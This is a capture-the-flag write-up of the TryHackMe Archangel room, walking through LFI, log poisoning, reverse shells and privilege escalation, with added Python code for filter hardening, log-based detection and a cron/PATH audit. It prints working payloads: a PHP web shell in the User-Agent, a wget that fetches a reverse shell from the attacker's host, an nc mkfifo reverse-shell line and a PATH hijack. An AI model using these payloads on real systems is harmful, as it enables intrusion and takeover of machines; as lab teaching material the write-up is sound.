Archangel Write-up

Description

Archangel is a boot2root CTF on TryHackMe. A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.

Enumeration

First, we determine which services are running on the target machine. We start a full port scan with Nmap using the command sudo nmap -p- $TARGET_IP:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 15:53 EST
Nmap scan report for localhost ($TARGET_IP)
Host is up (0.080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 116.07 seconds

As you can see the target is running SSH on port 22 and a web server on port 80. We can now check out the website.

Website

On the website we can inspect the HTTP response headers: open the developer console and navigate to the “Network” tab. The headers show that the server runs Apache 2.4.29 on an Ubuntu machine.

HTTP header of the response

The website also reveals a domain name for the server; it appears as the domain part of the email address shown on the page.

Domain name

Add that domain to your /etc/hosts file. You should then be able to navigate to the domain and see an “under development” page together with the first flag.

First Flag

Next we can check if a “robots.txt” file exists. Luckily for us there is one. The “robots.txt” file contains the path “/test.php”.

robots.txt file

On the “/test.php” path there is a button. Pressing it makes the page include another file.

test.php

After clicking the button, new text appears and the URL changes to carry a parameter.

After clicking on the button

We can now test for an LFI vulnerability. The “view” parameter is prone to LFI, and we can use it to read the source code of “test.php” itself:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

Base64 encoded source code of test.php

This returns the source code of “test.php” as base64 encoded data. We can decode it with CyberChef or in bash with the command echo <source code> | base64 -d > test.php. Opening the file in a text editor reveals the filter and another flag.

Source code of test.php

We can easily bypass that filter by using “.././..” instead of “../..”, which the filter does not catch. The following URL bypasses the filter and displays the “/etc/passwd” file:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../etc/passwd

/etc/passwd of the target machine
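To see why the “.././..” trick works and what a fixed filter looks like, here is an added example (not code from the write-up or the room) that models both filters in Python. The naive version is a reconstruction and an assumption: the write-up only tells us that “../..” is blocked while “.././..” and the php://filter URL pass, so the model rejects the literal string “../..” and requires the development_testing path to appear in the value. The hardened version canonicalises the path first and checks that it still lies inside that directory. The probe file name page.php is constructed.

```python
import posixpath

# Directory test.php is meant to serve files from (path taken from the write-up).
ALLOWED_DIR = "/var/www/html/development_testing"


def naive_filter(view: str) -> bool:
    """Reconstruction (assumption) of the substring filter: block the literal
    '../..' and require ALLOWED_DIR to appear anywhere in the value.
    Returns True when the file would be included."""
    return "../.." not in view and ALLOWED_DIR in view


def hardened_filter(view: str) -> bool:
    """Reject stream wrappers and NUL bytes outright, then collapse '.' and '..'
    components and allow the path only if it still lies under ALLOWED_DIR.
    The trailing '/' in the prefix check stops a sibling directory such as
    development_testing_other from passing."""
    if "://" in view or "\0" in view:
        return False
    resolved = posixpath.normpath(view)
    return resolved == ALLOWED_DIR or resolved.startswith(ALLOWED_DIR + "/")


# Constructed probes: the first is a legitimate include, the rest are the
# write-up's own values.
PROBES = {
    "legit": f"{ALLOWED_DIR}/./page.php",
    "plain_traversal": f"{ALLOWED_DIR}/../../../../etc/passwd",
    "dot_slash_bypass": f"{ALLOWED_DIR}/.././.././.././../etc/passwd",
    "php_filter": f"php://filter/convert.base64-encode/resource={ALLOWED_DIR}/test.php",
    "access_log": f"{ALLOWED_DIR}/.././.././.././../var/log/apache2/access.log",
}


def compare() -> dict:
    """Map each probe name to (naive filter result, hardened filter result)."""
    return {name: (naive_filter(value), hardened_filter(value))
            for name, value in PROBES.items()}


if __name__ == "__main__":
    for name, (naive, hard) in compare().items():
        verdict = lambda ok: "allow" if ok else "block"
        print(f"{name:18} naive={verdict(naive)}  hardened={verdict(hard)}")
```

Running it shows the naive filter allowing every bypass value the write-up used while the hardened one blocks all of them and still allows the legitimate include. posixpath.normpath only normalises the string; a real PHP fix would additionally call realpath() on the filesystem so that symlinks cannot point outside the directory, and should use an allow-list of file names where that is possible.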

We can also test whether the Apache access log is readable through the same vulnerability. The following URL retrieves it successfully:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log

Initial Access

With that knowledge we can perform log poisoning to get a reverse shell. Start Burp Suite and intercept a request. Place the PHP code <?php system($_GET['cmd']); ?> inside the “User-Agent” field, so that it is written into the access log.

Performing log poisoning

When the poisoned log is included, the PHP code is executed, so we can now inject shell commands and read their output inside the access log. An example request for the id command:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=id

id command
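From the defender's side, every step so far leaves a distinctive trace in the very access log that gets poisoned. The following added example (my own code, not part of the write-up) parses Apache combined-format log lines and flags the three patterns used above: PHP tags in the User-Agent or Referer header, PHP stream wrappers such as php://filter in a query value, and “..” components that resolve to a sensitive file. The log lines, IP address, timestamps and the page.php file name are constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, as produced by the Apache 2.4.29 seen on the target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

PHP_TAGS = ("<?php", "<?=")
STREAM_WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://")
# Files the write-up reads through the LFI; extend for your own environment.
SENSITIVE = ("/etc/passwd", "/var/log/apache2/")

# Constructed sample log: one benign include, then the write-up's four steps.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Feb/2021:16:01:12 -0500] "GET /test.php?view=/var/www/html/development_testing/page.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2021:16:02:40 -0500] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 1480 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2021:16:05:03 -0500] "GET /test.php?view=/var/www/html/development_testing/.././.././.././../etc/passwd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2021:16:07:55 -0500] "GET /test.php HTTP/1.1" 200 300 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.5 - - [17/Feb/2021:16:08:10 -0500] "GET /test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
"""


def scan_line(line: str) -> list:
    """Return the list of rule names triggered by one log line."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return ["unparseable line"]
    findings = []
    # 1. Log poisoning: PHP code planted in a header that Apache writes to the log.
    for field in ("ua", "referer"):
        if any(tag in m[field] for tag in PHP_TAGS):
            findings.append(f"php tag in {field}")
    # 2. Suspicious query values; parse_qs URL-decodes them, so %2e%2e is seen as '..'.
    query = urlsplit(m["target"]).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if value.lower().startswith(STREAM_WRAPPERS):
                findings.append(f"stream wrapper in {name}")
            if ".." in value.split("/"):
                resolved = posixpath.normpath(value)
                findings.append(f"traversal in {name} -> {resolved}")
                if resolved.startswith(SENSITIVE):
                    findings.append(f"sensitive file via {name}")
    return findings


def scan_log(text: str) -> list:
    """Return (line number, findings) for every non-empty line that triggered a rule."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            findings = scan_line(line)
            if findings:
                hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

The same rules work as a starting point for a SIEM query; the traversal rule deliberately looks for “..” as a path component rather than for the string “../..”, so the “.././..” variant is caught too.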

Initial Access

We can now use this simple web shell to upload a reverse shell. I have used the PHP reverse shell of Pentestmonkey. Host a web server with that shell on your machine and inject a wget command to download the reverse shell.

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=wget%20http://$YOUR_IP_AND_PORT/s.php

After starting a netcat listener on your host with the command nc -lvnp 1234, navigate to the URL “http://mafialive.thm/test.php?view=/var/www/html/development_testing/s.php” to get a reverse shell.

listening on [any] 1234 ...
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:27:09 up 1:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Next drop into a TTY shell with the following Python command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Finally you can read the user flag with the command cat /home/archangel/user.txt.

Enumeration

During enumeration we spot in /etc/crontab that a cronjob runs every minute as the archangel user.

/etc/crontab

The “helloworld.sh” script that this job runs is writable by our www-data user.

helloworld.sh script permissions

Privilege Escalation to the archangel user

Now we can again start a netcat listener on the attacker machine. After that we can place a netcat reverse shell inside the “helloworld.sh” script to gain a shell as archangel.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $MACHINE_IP 1234 >/tmp/f" >> helloworld.sh

Reverse shell as archangel

Now we can read the second flag, which is placed inside the “secret” directory of the archangel user.

Second user flag

Inside the “secret” directory there is a binary called “backup” with the SUID bit set. Running strings against the binary reveals that it runs cp /home/user/archangel/myfiles/* /opt/backupfiles.

Privilege Escalation to root

The “backup” binary can be abused to escalate our privileges, because it calls cp without an absolute path and therefore looks it up through PATH. Create a file called “cp” in the “secret” directory with touch cp, then run the following commands to turn it into an executable script that starts bash:

echo '#!/bin/bash' >> cp
echo '/bin/bash' >> cp
chmod +x cp

After that change your “PATH” variable to contain the current folder first.

export PATH="/home/archangel/secret:$PATH"

Finally run the “backup” binary with ./backup. It now executes our fake cp instead of /bin/cp, so we should be root and able to read the root flag:

Escalated privileges to root

Mitigation

Never deploy anything that is under development on a live machine. The LFI filter should also be hardened: blocking the single string “../..” is not enough, the requested path should be resolved and rejected unless it stays inside the intended directory, and stream wrappers such as php://filter should not be accepted. Keeping the Apache access log unreadable for the www-data user would have stopped the log poisoning step as well. Furthermore the “helloworld.sh” script should only be writable by its owner, and the backup binary should call cp by its absolute path instead of relying on PATH.
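The last two points are easy to check automatically. The following added example (my own code, not part of the write-up) builds a throw-away directory tree that mirrors the two findings, a cron-run helloworld.sh that anyone can edit and a user-writable directory placed before the system directory in PATH, then audits it: it parses a system-crontab line, checks whether the script is writable by group or others, flags that the backup command names cp without an absolute path, and shows how the shell's PATH lookup picks a “cp” from the writable directory first. The crontab line, the directory names and the stub “cp” files are constructed; the command string is the one the write-up recovered with strings.

```python
import os
import shlex
import stat
import tempfile

# Command the write-up recovered from the SUID "backup" binary with strings.
BACKUP_CMD = "cp /home/user/archangel/myfiles/* /opt/backupfiles"


def build_lab() -> dict:
    """Construct a temporary tree (paths are assumptions, not the room's) with:
    helloworld.sh world-writable, a 'secret' directory holding a cp stub,
    and a 'sysbin' directory standing in for the real system directory."""
    root = tempfile.mkdtemp(prefix="archangel-lab-")
    secret = os.path.join(root, "secret")
    sysbin = os.path.join(root, "sysbin")
    os.makedirs(secret)
    os.makedirs(sysbin)
    script = os.path.join(root, "helloworld.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho hello world\n")
    os.chmod(script, 0o777)                      # the weak setting: world-writable
    for directory in (secret, sysbin):           # an executable "cp" in each directory
        stub = os.path.join(directory, "cp")
        with open(stub, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(stub, 0o755)
    crontab = f"* * * * * archangel {script}\n"  # constructed /etc/crontab entry
    return {"root": root, "secret": secret, "sysbin": sysbin,
            "script": script, "crontab": crontab}


def cron_jobs(crontab_text: str):
    """Yield (user, program) from system-crontab job lines (5 time fields, user,
    command); environment assignments and comments are skipped."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], shlex.split(fields[6])[0]


def writable_by_others(path: str) -> bool:
    """True when group or world may modify the file; anything cron or a SUID
    binary executes should be writable by its owner only."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def resolve(program: str, path: str):
    """Mimic the shell's lookup: an absolute name is used as-is, otherwise the
    first PATH directory holding an executable of that name wins."""
    if program.startswith("/"):
        return program if os.access(program, os.X_OK) else None
    for directory in path.split(os.pathsep):
        candidate = os.path.join(directory, program)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def audit(lab: dict) -> dict:
    """Run the checks the Mitigation section calls for against the lab tree."""
    findings = {}
    jobs = list(cron_jobs(lab["crontab"]))
    findings["cron_jobs"] = jobs
    findings["script_writable_by_others"] = writable_by_others(jobs[0][1])
    program = shlex.split(BACKUP_CMD)[0]
    findings["backup_uses_relative_cp"] = not program.startswith("/")
    hijack_path = os.pathsep.join([lab["secret"], lab["sysbin"]])
    findings["cp_with_secret_in_path"] = resolve(program, hijack_path)
    findings["cp_with_system_path"] = resolve(program, lab["sysbin"])
    return findings


def harden(lab: dict) -> bool:
    """Apply the fix for the script (owner-only write) and re-check it."""
    os.chmod(lab["script"], 0o755)
    return writable_by_others(lab["script"])


if __name__ == "__main__":
    lab = build_lab()
    for key, value in audit(lab).items():
        print(f"{key}: {value}")
    print("still writable after fix:", harden(lab))
```

The audit reports the script as writable by others, the backup command as using a relative cp, and cp resolving to the stub in the “secret” directory when that directory precedes the system directory in PATH; with the system directory alone, the system copy is chosen. For a real SUID program the equivalent fix is to invoke /bin/cp (or use execve with a full path) and to ignore the caller's PATH altogether.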

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Rabbit